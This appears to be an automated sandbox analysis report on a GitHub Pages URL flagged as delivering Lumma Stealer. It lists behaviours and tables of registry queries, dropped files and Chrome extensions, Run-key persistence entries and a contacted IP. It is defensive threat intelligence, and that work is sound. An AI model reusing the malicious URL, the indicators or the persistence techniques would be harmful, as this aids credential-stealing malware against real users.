Analysis Overview
Threat Level: Known bad
The file https://joseernestoongithub.github.io/mgen/ was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Downloads MZ/PE file
Blocklisted process makes network request
Contacts a large (534) amount of remote hosts
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Checks BIOS information in registry
Unexpected DNS network traffic destination
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates connected drives
Adds Run key to start application
Drops desktop.ini file(s)
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks installed software on the system
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
NSIS installer
Enumerates system info in registry
Creates scheduled task(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Suspicious use of SendNotifyMessage
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies Control Panel
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-25 01:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 01:05
Reported
2024-05-25 01:32
Platform
win10v2004-20240508-en
Max time kernel
1605s
Max time network
1635s
Command Line
Signatures
Lumma Stealer
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Contacts a large (534) amount of remote hosts
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\KrbkREgJ\PCumqNk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\YsdiyzJB\bmmOwtb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 45.155.250.90 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFFlexUpdater = "cmd /c \"start /min /d \"C:\\Users\\Admin\\AppData\\Local\\PDFFlex\\\" node.exe update.js\"" | N/A | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\AAnZBgL.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | N/A | N/A |
| File opened (read-only) | \??\V: | N/A | N/A |
| File opened (read-only) | \??\K: | N/A | N/A |
| File opened (read-only) | \??\L: | N/A | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | N/A | N/A |
| File opened (read-only) | \??\W: | N/A | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | N/A | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | N/A | N/A |
| File opened (read-only) | \??\Q: | N/A | N/A |
| File opened (read-only) | \??\A: | N/A | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | N/A | N/A |
| File opened (read-only) | \??\M: | N/A | N/A |
| File opened (read-only) | \??\U: | N/A | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | N/A | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | N/A | N/A |
| File opened (read-only) | \??\T: | N/A | N/A |
| File opened (read-only) | \??\H: | N/A | N/A |
| File opened (read-only) | \??\P: | N/A | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | N/A | N/A |
| File opened (read-only) | \??\B: | N/A | N/A |
| File opened (read-only) | \??\E: | N/A | N/A |
| File opened (read-only) | \??\J: | N/A | N/A |
| File opened (read-only) | \??\W: | N/A | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | N/A | N/A |
| File opened (read-only) | \??\I: | N/A | N/A |
| File opened (read-only) | \??\A: | N/A | N/A |
| File opened (read-only) | \??\N: | N/A | N/A |
| File opened (read-only) | \??\H: | N/A | N/A |
| File opened (read-only) | \??\V: | N/A | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api6.my-ip.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | N/A | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
